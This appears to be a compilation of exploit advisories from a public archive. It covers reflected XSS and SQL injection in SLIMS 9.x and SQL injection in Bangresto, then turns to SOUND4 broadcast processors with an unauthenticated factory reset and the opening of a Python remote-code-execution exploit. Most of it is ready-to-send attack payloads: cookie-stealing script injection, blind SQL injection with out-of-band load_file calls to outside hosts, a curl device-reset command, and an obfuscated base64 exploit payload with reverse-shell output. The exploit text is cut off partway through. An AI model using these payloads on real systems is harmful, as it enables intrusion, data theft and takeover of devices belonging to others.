<pre><code>## Title: Senayan Library Management System v9.2.2 a.k.a SLIMS 9 XSS-Reflected - inserting gif - redirect to outside HTTPS server<br />## Author: nu11secur1ty<br />## Date: 12.21.2022<br />## Vendor: https://slims.web.id/web/<br />## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.2.2<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.2<br /><br />## Description:<br />The value of manual insertion `point 3` is copied into the HTML<br />document as plain text between tags.<br />The payload t8xqv<script>alert(1)</script>uou2q was submitted in the<br />manual insertion `point 3`.<br />This input was echoed unmodified in the application's response.<br />The attacker can trick the already authenticated users to visit a very<br />dangerous web page or malicious javascript exploit.<br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Payloads:<br /><br />```GET<br />GET /slims9_bulian-9.2.2/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%6e%75%31%31%73%65%63%75%72%31%74%79%2e%63%6f%6d%2f%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id%5c%5cwtf%27))%2b%27%27%2b(select%20load_file(%27%5c%5c%5c%5cazditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id%5c%5cdzd%27))%2b%27<br />HTTP/1.1<br />Host: pwnedhost.com<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107<br />Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: SenayanAdmin=ijs22qmki227r86feh6bppc56o; admin_logged_in=1<br />Connection: close<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.2)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/mnpw30)<br /><br />## Time spent<br />`00:05:00`<br /><br /></code></pre>
<pre><code>## Title: Senayan Library Management System v9.2.1 a.k.a SLIMS 9 SQLi<br />## Author: nu11secur1ty<br />## Date: 12.20.2022<br />## Vendor: https://slims.web.id/web/<br />## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.2.1<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.1/SQLi<br /><br />## Description:<br />The manual insertion `point 4` appears to be vulnerable to SQL<br />injection attacks. The payload '+(select<br />load_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.stupid.com\\dzd'))+'<br />was submitted in the manual insertion `point 4`.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed.<br />The attacker can take information from all database columns of this<br />system by using this vulnerability.<br /><br />## STATUS: HIGH Vulnerability - CRITICAL<br /><br />[+] Payload:<br /><br />```MySQL<br />---<br />Parameter: class (GET)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY<br />or GROUP BY clause<br /> Payload: reportView=true&year=2002&class=bbbb'+(select<br />load_file('\\\\716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.id\\nbq'))+''<br />RLIKE (SELECT (CASE WHEN (5179=5179) THEN 0x62626262+(select<br />load_file(0x5c5c5c5c37313667623163666539676b6a61347a646a34357178783932303876776c6b636e30656e3662762e736c696d732e7765622e69645c5c6e6271))+''<br />ELSE 0x28 END)) AND 'BcGE'='BcGE&membershipType=a'''+(select<br />load_file('\\\\c0dsife82nybqm59yrpe81r86zct0kobrzip5it7.oastify.com\\bjr'))+'&collType=aaaa'+(select<br />load_file('\\\\dctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id\\wtf'))+''+(select<br />load_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id\\dzd'))+'<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.1/SQLi)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/zp75bx)<br /><br />## Time spent<br />`00:15:00`<br /><br />## Writing an exploit<br />`00:05:00`<br /><br /></code></pre>
<pre><code>## Title: Senayan Library Management System v9.2.1 a.k.a SLIMS 9<br />XSS-Reflected - inserting gif - redirect to outside HTTPS server<br />## Author: nu11secur1ty<br />## Date: 12.20.2022<br />## Vendor: https://slims.web.id/web/<br />## Software: https://github.com/slims/slims9_bulian/releases/download/v9.2.1/slims9_bulian-9.2.1.zip<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.1<br /><br />## Description:<br />The value of manual insertion `point 3` is copied into the HTML<br />document as plain text between tags.<br />The payload t8xqv<script>alert(1)</script>uou2q was submitted in the<br />manual insertion `point 3`.<br />This input was echoed unmodified in the application's response.<br />The attacker can trick the already authenticated users to visit an<br />very dangerous web page ot malicious javascript exploit.<br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Payloads:<br /><br />```GET<br />GET /slims9_bulian-9.2.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%6e%75%31%31%73%65%63%75%72%31%74%79%2e%63%6f%6d%2f%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%63%64%6e%35%2d%63%61%70%72%69%6f%66%69%6c%65%73%2e%6e%65%74%64%6e%61%2d%73%73%6c%2e%63%6f%6d%2f%77%70%2d%63%6f%6e%74%65%6e%74%2f%75%70%6c%6f%61%64%73%2f%32%30%31%37%2f%30%37%2f%49%4d%47%5f%30%30%36%38%2e%67%69%66%22%3e%0a%0a&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id%5c%5cwtf%27))%2b%27%27%2b(select%20load_file(%27%5c%5c%5c%5cazditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id%5c%5cdzd%27))%2b%27<br />HTTP/1.1<br />Host: pwnedhost.com<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107<br />Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: SenayanAdmin=o6o88hktpej7qdtu621h58q16q; admin_logged_in=1<br />Connection: close<br />Content-Length: 2<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.1)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/i20ipf)<br /><br />## Time spent<br />`01:35:00`<br /><br /></code></pre>
<pre><code>## Title: Senayan Library Management System v9.2.0 a.k.a SLIMS 9 SQLi<br />## Author: nu11secur1ty<br />## Date: 12.19.2022<br />## Vendor: https://slims.web.id/web/<br />## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.2.0<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.0/SQLi<br /><br />## Description:<br />The manual insertion `point 5` appears to be vulnerable to SQL<br />injection attacks. The payload '+(select<br />load_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.stupid.com\\dzd'))+'<br />was submitted in the manual insertion `point 5`.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed.<br />The attacker can take information from all database columns of this<br />system by using this vulnerability.<br /><br />## STATUS: HIGH Vulnerability - CRITICAL<br /><br />[+] Payload:<br /><br />```MySQL<br />---<br />Parameter: class (GET)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY<br />or GROUP BY clause<br /> Payload: reportView=true&year=2002&class=bbbb'+(select<br />load_file('\\\\716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.id\\nbq'))+''<br />RLIKE (SELECT (CASE WHEN (8839=8839) THEN 0x62626262+(select<br />load_file(0x5c5c5c5c37313667623163666539676b6a61347a646a34357178783932303876776c6b636e30656e3662762e736c696d732e7765622e69645c5c6e6271))+''<br />ELSE 0x28 END)) AND<br />'IzAa'='IzAa&membershipType=a''&collType=aaaa'+(select<br />load_file('\\\\dctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id\\wtf'))+''+(select<br />load_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id\\dzd'))+'<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.0/SQLi)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/jy5pql)<br /><br />## Time spent<br />`00:10:00`<br /><br />## Writing an exploit<br />`00:05:00`<br /><br /></code></pre>
<pre><code>## Title: Senayan Library Management System v9.2.0 a.k.a SLIMS 9 XSS-Reflected - inserting gif - redirect to outside HTTPS server<br />## Author: nu11secur1ty<br />## Date: 12.19.2022<br />## Vendor: https://slims.web.id/web/<br />## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.2.0<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.0<br /><br />## Description:<br />The value of manual insertion `point 3` is copied into the HTML<br />document as plain text between tags.<br />The payload t8xqv<script>alert(1)</script>uou2q was submitted in the<br />manual insertion `point 3`.<br />This input was echoed unmodified in the application's response.<br />The attacker can trick the already authenticated users to visit an<br />very dangerous web page ot malicious javascript exploit.<br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Payloads:<br /><br />```GET<br />GET /slims9_bulian-9.2.0/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%62%62%62%62%27%2b%28%73%65%6c%65%63%74%20%6c%6f%61%64%5f%66%69%6c%65%28%27%5c%5c%5c%5c%37%31%36%67%62%31%63%66%65%39%67%6b%6a%61%34%7a%64%6a%34%35%71%78%78%39%32%30%38%76%77%6c%6b%63%6e%30%65%6e%36%62%76%2e%73%6c%69%6d%73%2e%77%65%62%2e%69%64%5c%5c%6e%62%71%27%29%29%2b%27%74%38%78%71%76%3c%64%69%76%3e%3c%69%6d%61%67%65%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%67%69%70%68%79%2e%63%6f%6d%2f%6d%65%64%69%61%2f%62%54%42%79%75%74%61%6d%4a%53%6a%68%53%2f%67%69%70%68%79%2e%67%69%66%20%6f%6e%6c%6f%61%64%73%74%61%72%74%3d%61%6c%65%72%74%28%31%33%33%37%29%3e%68%65%6c%6c%6f%20%66%72%6f%6d%20%6e%75%31%31%73%65%63%75%72%31%74%79%3c%2f%64%69%76%3e%3c%2f%73%63%72%69%70%74%3e%75%6f%75%32%0a&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id%5c%5cwtf%27))%2b%27<br />HTTP/1.1<br />Host: pwnedhost.com<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107<br />Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: SenayanAdmin=i6ml8c8i4dmi37vtcpnnf9jhm9; admin_logged_in=1<br />Connection: close<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.0)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/5smxxm)<br /><br />## Time spent<br />`02:35:00`<br /><br /></code></pre>
<pre><code>## Title: Senayan Library Management System v9.1.1 a.k.a SLIMS 9 SQLi<br />## Author: nu11secur1ty<br />## Date: 11.09.2022<br />## Vendor: https://slims.web.id/web/<br />## Software: https://github.com/slims/slims9_bulian/releases/download/v9.1.1/slims9_bulian-9.1.1.zip<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.1.1/SQLi<br /><br />## Description:<br />The `class` parameter appears to be vulnerable to SQL injection attacks.<br />The payload '+(select<br />load_file('\\\\716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.id\\nbq'))+'<br />was submitted in the class parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed.<br />The attacker can take information from all database columns of this<br />system by using this vulnerability.<br /><br />## STATUS: HIGH Vulnerability - CRITICAL<br /><br />[+] Payload:<br /><br />```MySQL<br />---<br />Parameter: class (GET)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY<br />or GROUP BY clause<br /> Payload: reportView=true&year=2002&class=bbbb'+(select<br />load_file('\\\\716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.id\\nbq'))+''<br />RLIKE (SELECT (CASE WHEN (7860=7860) THEN 0x62626262+(select<br />load_file(0x5c5c5c5c37313667623163666539676b6a61347a646a34357178783932303876776c6b636e30656e3662762e736c696d732e7765622e69645c5c6e6271))+''<br />ELSE 0x28 END)) AND<br />'xGIA'='xGIA&membershipType=a''&collType=aaaa'+(select<br />load_file('\\\\dctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id\\wtf'))+'<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.1.1/SQLi)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/3li3zp)<br /><br />## Time spent<br />`00:30:00`<br /><br />## Writing an exploit<br />`00:15:00`<br /><br /></code></pre>
<pre><code>## Title: Senayan Library Management System v9.1.1 a.k.a SLIMS 9 XSS-Reflected - PHPSESSID Hijacking + inserting webp image<br />## Author: nu11secur1ty<br />## Date: 12.17.2022<br />## Vendor: https://slims.web.id/web/<br />## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.1.1<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.1.1<br /><br />## Description:<br />The value of the `class` request parameter is copied into the HTML<br />document as plain text between tags.<br />The payload ytrrh<script>alert(1)</script>z3nj2 was submitted in the<br />class parameter. This input was echoed unmodified in the application's<br />response.<br />The attacker can trick some authenticated user to visit his page and<br />give to him very sensitive information about the system.<br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Payloads:<br />0.0<br /><br />```GET<br />GET /slims9_bulian-9.1.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=nu11secur1ty<script>alert(document.cookie)</script>&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.oastify.com%5c%5cwtf%27))%2b%27<br />HTTP/1.1<br />Host: pwnedhost.com<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107<br />Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: SenayanAdmin=v37jtjmmhl46f8tge63h37nin1; admin_logged_in=1<br />Connection: close<br /><br />```<br />0.1<br />```GET<br />GET /slims9_bulian-9.1.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%3c%64%69%76%3e%3c%69%6d%61%67%65%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%72%61%77%2e%67%69%74%68%75%62%75%73%65%72%63%6f%6e%74%65%6e%74%2e%63%6f%6d%2f%6e%75%31%31%73%65%63%75%72%31%74%79%2f%58%53%53%69%67%68%74%2f%6d%61%73%74%65%72%2f%58%53%53%2d%69%6d%61%67%65%2f%69%6d%61%67%65%2f%6b%6f%73%74%61%61%6b%61%74%69%6c%2e%77%65%62%70%20%6f%6e%6c%6f%61%64%73%74%61%72%74%3d%61%6c%65%72%74%28%31%33%33%37%29%3e%68%65%6c%6c%6f%20%66%72%6f%6d%20%6e%75%31%31%73%65%63%75%72%31%74%79%3c%2f%64%69%76%3e&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.oastify.com%5c%5cwtf%27))%2b%27<br />HTTP/1.1<br />Host: pwnedhost.com<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107<br />Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: SenayanAdmin=v37jtjmmhl46f8tge63h37nin1; admin_logged_in=1<br />Connection: close<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.1.1)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/ibdulr)<br /><br />## Time spent<br />`01:30:00`<br /><br /></code></pre>
<pre><code>## Title: Bangresto 1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 12.16.2022<br />## Vendor: https://axcora.com/, https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html<br />## Demo: https://axcora.my.id/bangrestoapp/start.php<br />## Software: https://github.com/mesinkasir/bangresto<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto<br /><br />## Description:<br />The `itemID` parameter appears to be vulnerable to SQL injection attacks.<br />The payload ' was submitted in the itemID parameter, and a database<br />error message was returned.<br />The attacker can be stooling all information from the database of this<br />application.<br /><br />## STATUS: CRITICAL Vulnerability<br /><br />[+] Payload:<br /><br />```MySQL<br />---<br />Parameter: itemID (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)<br /> Payload: itemID=(UPDATEXML(2539,CONCAT(0x2e,0x7171767871,(SELECT<br />(ELT(2539=2539,1))),0x7170706a71),2327))&menuID=1<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/moapnd)<br /><br />## Time spent<br />`00:30:00`<br /></code></pre>
<pre><code><br />SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (restorefactory.cgi) Unauthenticated Factory Reset<br /><br /><br />Vendor: SOUND4 Ltd.<br />Product web page: https://www.sound4.com | https://www.sound4.biz<br />Affected version: FM/HD Radio Processing:<br /> Impact/Pulse/First (Version 2: 1.1/2.15)<br /> Impact/Pulse/First (Version 1: 2.1/1.69)<br /> Impact/Pulse Eco 1.16<br /> Voice Processing:<br /> BigVoice4 1.2<br /> BigVoice2 1.30<br /> Web-Audio Streaming:<br /> Stream 1.1/2.4.29<br /> Watermarking:<br /> WM2 (Kantar Media) 1.11<br /><br />Summary: The SOUND4 IMPACT introduces an innovative process - mono and<br />stereo parts of the signal are processed separately to obtain perfect<br />consistency in terms of both sound and level. Therefore, in moving<br />reception, when the FM receiver switches from stereo to mono and back to<br />stereo, the sound variations and changes in level are reduced by over 90%.<br />In the SOUND4 IMPACT processing chain, the stereo expander can be used<br />substantially without any limitations.<br /><br />With its advanced functionalities and impressive versatility, SOUND4<br />PULSE gives clients the ultimate price - performance ratio, providing<br />much more than just a processor. Flexible and powerful, it ensures perfect<br />sound quality and full compatibility with radio broadcasting standards<br />and can be used simultaneously for FM and HD, DAB, DRM or streaming.<br /><br />SOUND4 FIRST provides all the most important functionalities you need<br />in an FM/HD processor and sets the bar high both in terms of performance<br />and affordability. Designed to deliver a sound of uncompromising quality,<br />this tool gives you 2-band processing, a digital stereo generator and an<br />IMPACT Clipper.<br /><br />Desc: The device allows unauthenticated attackers to visit the unprotected<br />/usr/cgi-bin/restorefactory.cgi endpoint and reset the device to its factory<br />default configuration. Once a POST request is made, the device will reboot<br />with its default settings allowing the attacker to bypass authentication<br />and take full control of the system.<br /><br />Tested on: Apache/2.4.25 (Unix)<br /> OpenSSL/1.0.2k<br /> PHP/7.1.1<br /> GNU/Linux 5.10.43 (armv7l)<br /> GNU/Linux 4.9.228 (armv7l)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5742<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5742.php<br /><br /><br />26.09.2022<br /><br />--<br /><br /><br />> curl -kX POST "https://RADIO/cgi-bin/restorefactory.cgi" --data "0x539" \<br />> sleep 120<br /><br />#login admin:admin<br /></code></pre>
<pre><code>#!/usr/bin/env python<br />#<br />#<br /># SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (upload.cgi) Unauthenticated Remote Code Execution<br />#<br />#<br /># Vendor: SOUND4 Ltd.<br /># Product web page: https://www.sound4.com | https://www.sound4.biz<br /># Affected version: FM/HD Radio Processing:<br /># Impact/Pulse/First (Version 2: 1.1/2.15)<br /># Impact/Pulse/First (Version 1: 2.1/1.69)<br /># Impact/Pulse Eco 1.16<br /># Voice Processing:<br /># BigVoice4 1.2<br /># BigVoice2 1.30<br /># Web-Audio Streaming:<br /># Stream 1.1/2.4.29<br /># Watermarking:<br /># WM2 (Kantar Media) 1.11<br />#<br /># Summary: The SOUND4 IMPACT introduces an innovative process - mono and<br /># stereo parts of the signal are processed separately to obtain perfect<br /># consistency in terms of both sound and level. Therefore, in moving<br /># reception, when the FM receiver switches from stereo to mono and back to<br /># stereo, the sound variations and changes in level are reduced by over 90%.<br /># In the SOUND4 IMPACT processing chain, the stereo expander can be used<br /># substantially without any limitations.<br />#<br /># With its advanced functionalities and impressive versatility, SOUND4<br /># PULSE gives clients the ultimate price - performance ratio, providing<br /># much more than just a processor. Flexible and powerful, it ensures perfect<br /># sound quality and full compatibility with radio broadcasting standards<br /># and can be used simultaneously for FM and HD, DAB, DRM or streaming.<br />#<br /># SOUND4 FIRST provides all the most important functionalities you need<br /># in an FM/HD processor and sets the bar high both in terms of performance<br /># and affordability. Designed to deliver a sound of uncompromising quality,<br /># this tool gives you 2-band processing, a digital stereo generator and an<br /># IMPACT Clipper.<br />#<br /># Desc: SOUND4 products suffer from an unauthenticated remote code execution<br /># vulnerability. An attacker can exploit this vulnerability by abusing the<br /># firmware upgrade/upload functionality, which contains a path traversal flaw.<br /># This allows the attacker to arbitrarily write a malicious file to a location<br /># on the system with www-data permissions, which can be executed to gain unauthorized<br /># access.<br /># ---------------------------------------------------------------------------<br /># Starting handler on port 6161.<br /># Writing callback file...<br /># Connection from 192.168.1.137:58670<br /># You got shell.<br /># id<br /># uid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data)<br /># exit<br /># *** Connection closed by remote host ***<br /># ---------------------------------------------------------------------------<br />#<br /># Tested on: Apache/2.4.25 (Unix)<br /># OpenSSL/1.0.2k<br /># PHP/7.1.1<br /># GNU/Linux 5.10.43 (armv7l)<br /># GNU/Linux 4.9.228 (armv7l)<br />#<br />#<br /># Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /># Macedonian Information Security Research and Development Laboratory<br /># Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br />#<br />#<br /># Advisory ID: ZSL-2022-5741<br /># Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5741.php<br />#<br />#<br /># 26.09.2022<br />#<br />#<br /><br />import ipaddress as irukandji#-- -----------------------------<br />from time import sleep#---------- ----------------------------<br />import threading#----------------- ---------------------------<br />import telnetlib#------------------ --------------------------<br />import requests#-------------------- -------------------------<br />import socket#----------------------- ------------------------<br />import base64#------------------------ -----------------------<br />import time#--------------------------- ----------------------<br />import sys#----------------------------- ---------------------<br />import re#------------------------------- --------------------<br />importer = "Y2xhc3MgVmlkZW9LaWxsZWRUaGV"+ "SYWRpb1N0YXI6DQog"<br />importer += "ICAgDQogICAgZGVmIF9faW5pdF9f"+ "KHNlbGYpOg0KICAg"<br />importer += "ICAgICBzZWxmLnNlY3JldGFnZW50I"+ "D0gIkRqL09sZSIN"<br />importer += "CiAgICAgICAgc2VsZi5wYXlsb2FkID"+ "0gTm9uZQ0KICAg"<br />importer += "ICAgICBzZWxmLmRlcGxveSA9IE5vbmU"+ "NCiAgICAgICAg"<br />importer += "c2VsZi5yaG9zdCA9IE5vbmUNCiAgICA"+ "gICAgc2VsZi5s"<br />importer += "aG9zdCA9IE5vbmUNCiAgICAgICAgc2"+ "VsZi5scG9ydCA9"<br />importer += "IE5vbmUNCg0KICAgIGRlZiB0aGVfY"+ "XJncyhzZWxmKToN"<br />importer += "CiAgICAgICAgaWYgbGVuKHN5cy5h"+ "cmd2KSAhPSA0Og0K"<br />importer += "ICAgICAgICAgICAgc2VsZi50aGV"+ "fdXNhZ2UoKQ0KICAg"<br />importer += "ICAgICBlbHNlOg0KICAgICAgIC"+ "AgICAgc2VsZi5yaG9z"<br />importer += "dCA9IHN5cy5hcmd2WzFdDQogI"+ "CAgICAgICAgICBzZWxm"<br />importer += "Lmxob3N0ID0gc3lzLmFyZ3Zb"+ "Ml0NCiAgICAgICAgICAg"<br />importer += "IHNlbGYubHBvcnQgPSBpbnQ"+ "oc3lzLmFyZ3ZbM10pDQog"<br />importer += "ICAgICAgICAgICBpZiBub3"+ "QgImh0dHAiIGluIHNlbGYu"<br />importer += "cmhvc3Q6DQogICAgICAgI"+ "CAgICAgICAgc2VsZi5yaG9z"<br />importer += "dCA9ICJodHRwOi8ve30i"+ "LmZvcm1hdChzZWxmLnJob3N0"<br />importer += "KQ0KDQogICAgZGVmIHR"+ "oZV91c2FnZShzZWxmKToNCiAg"<br />importer += "ICAgICAgc2VsZi50aG"+ "Vfd2hhKCkNCiAgICAgICAgcHJp"<br />importer += "bnQoIlVzYWdlOiBwe"+ "XRob24ge30gW3RhcmdldElQOnRh"<br />importer += "cmdldFBPUlRdIFts"+ "aXN0ZW5JUF0gW2xpc3RlblBPUlRd"<br />importer += "Ii5mb3JtYXQoc3l"+ "zLmFyZ3ZbMF0pKQ0KICAgICAgICBl"<br />importer += "eGl0KDApDQoNCi"+ "AgICBkZWYgdGhlX3doYShzZWxmKToN"<br />importer += "CiAgICAgICAgd"+ "Gl0bCA9ICIiIg0KICAgICAgICAgL1xf"<br />importer += "X19fX18gIF9f"+ "DQogICAgICAgIC8tfiAgICAgLF5+IC8g"<br />importer += "X19uDQogICA"+ "gICAgLyAsLS0teCAvXy4tIkwvX18sXFwN"<br />importer += "CiAgICAgIC"+ "8tIi4tLS0uXF8uLScvISIgIFwgXFwNCiAg"<br />importer += "ICAgIDBcL"+ "zBfX18vICAgeCcgLyAgICApIHwNCiAgICAg"<br />importer += "IFwuX19f"+ "X19fLi0nXy57X18uLSJfLl4NCiAgICAgICBg"<br />importer += "eF9fX18"+ "sLi0iLC1+KCAuLSINCiAgICAgICAgICBfLi18"<br />importer += "ICxeLi"+ "1+ICJcXA0KICAgICBfXy4tfl8sLXwvXC8gICAg"<br />importer += "IGBpD"+ "QogICAgLyB1Li1+IC4te1wvICAgICAuLV4tLS4N"<br />importer += "CiAg"+ "ICBcLyAgIHZ+ICwtXnguX19fX30tLXIgfA0KICAg"<br />importer += "ICAg"+ "ICAvIC8iICAgICAgICAgICAgfCB8DQogICAgICBf"<br />importer += "L18vI"+ 